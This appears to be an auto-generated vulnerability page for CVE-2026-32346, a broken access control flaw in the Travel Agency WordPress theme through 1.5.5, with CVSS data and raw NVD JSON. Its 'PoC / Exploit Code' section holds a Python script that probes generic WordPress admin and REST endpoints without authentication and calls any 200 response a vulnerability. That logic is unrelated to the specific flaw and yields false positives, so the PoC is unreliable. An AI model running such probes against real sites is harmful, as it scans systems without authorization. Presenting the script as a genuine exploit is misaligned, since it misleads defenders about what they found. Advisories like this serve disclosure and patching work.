Security Vulnerability Report
中文
CVE-2026-32346 CVSS 5.3 MEDIUM

CVE-2026-32346

Published: 2026-03-13 19:54:46
Last Modified: 2026-04-29 10:16:59

Description

Missing Authorization vulnerability in raratheme Travel Agency travel-agency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Agency: from n/a through <= 1.5.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Travel Agency主题 <= 1.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32346 PoC - Missing Authorization in Travel Agency Theme # Target: WordPress site with Travel Agency theme <= 1.5.5 TARGET_URL = "http://target-wordpress-site.com" # Common AJAX endpoints that might be vulnerable VULNERABLE_ENDPOINTS = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/users", "/wp-admin/options-general.php", "/wp-admin/theme-editor.php" ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2026-32346""" print(f"[*] Checking CVE-2026-32346 on {TARGET_URL}") # Test unauthenticated access to sensitive endpoints for endpoint in VULNERABLE_ENDPOINTS: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, timeout=10) # If we get a 200 response without authentication, vulnerability exists if response.status_code == 200: print(f"[!] Potential vulnerability found at {endpoint}") print(f" Status Code: {response.status_code}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] No obvious vulnerability detected") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32346", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:46.237", "lastModified": "2026-04-29T10:16:59.493", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Travel Agency travel-agency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Agency: from n/a through <= 1.5.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Travel Agency travel-agency permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Travel Agency: desde n/a hasta &lt;= 1.5.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/travel-agency/vulnerability/wordpress-travel-agency-theme-1-5-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}